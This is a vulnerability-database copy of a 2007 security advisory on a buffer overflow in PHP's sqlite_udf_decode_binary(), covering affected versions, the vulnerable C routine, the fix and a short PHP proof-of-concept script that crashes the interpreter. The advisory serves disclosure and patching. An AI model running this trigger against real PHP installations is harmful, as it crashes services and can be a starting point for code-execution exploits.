Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16623
HistoryApr 08, 2007 - 12:00 a.m.

MOPB-41-2007:PHP 5 sqlite_udf_decode_binary() Buffer Overflow Vulnerability

2007-04-0800:00:00
vulners.com
4
JSON

Summary

When sqlite_udf_decode_binary() is called with a string only containing a single 0x01 char this will result in a call to the sqlite_decode_binary() function with an empty string as parameter. This leads to an exploitable buffer overflow.
Affected versions

Affected are PHP 4 < 4.4.5 and PHP 5 < 5.2.1
Detailed information

The sqlite_udf_decode_binary() function does not correctly handle invalid strings passed to it. When the passed string only contains of a single \x01 character a call to the function sqlite_decode_binary() of the bundled sqlite library will be made with an empty string as parameter. This is however not supported by the API function, it needs to be called with a string of atleast length 1.

int sqlite_decode_binary(const unsigned char *in, unsigned char *out){
int i, e;
unsigned char c;
e = *(in++);
i = 0;
while( (c = *(in++))!=0 ){
if( c==1 ){
c = *(in++) - 1;
}
out[i++] = c + e;
}
return i;
}

When the sqlite_decode_binary() function is called with an empty string it will overjump the ASCIIZ terminator and copy the bytes following it to the destination, until another ASCIIZ character is hit. This is similar to a standard strcpy() overflow.
Proof of concept, exploit or instructions to reproduce

To test for this vulnerability just try the following piece of code.

<?php

$z = &quot;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU&quot;;
$y = &quot;DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD&quot;;
$x = &quot;AQ                                                                        &quot;;
unset&#40;$z&#41;;
unset&#40;$y&#41;;
$x = base64_decode&#40;$x&#41;;

$y = sqlite_udf_decode_binary&#40;$x&#41;;

unset&#40;$x&#41;;

?>

This little POC will only crash PHP. A code execution exploit will be added to this site in the future. So check back soon.
Notes

This vulnerability was fixed by hardening the bundled sqlite library against being called with an empty string. If your PHP is however using a shared copy of an external sqlite library you stay vulnerable after upgrading to PHP 5.2.1 or PHP 4.4.6

JSON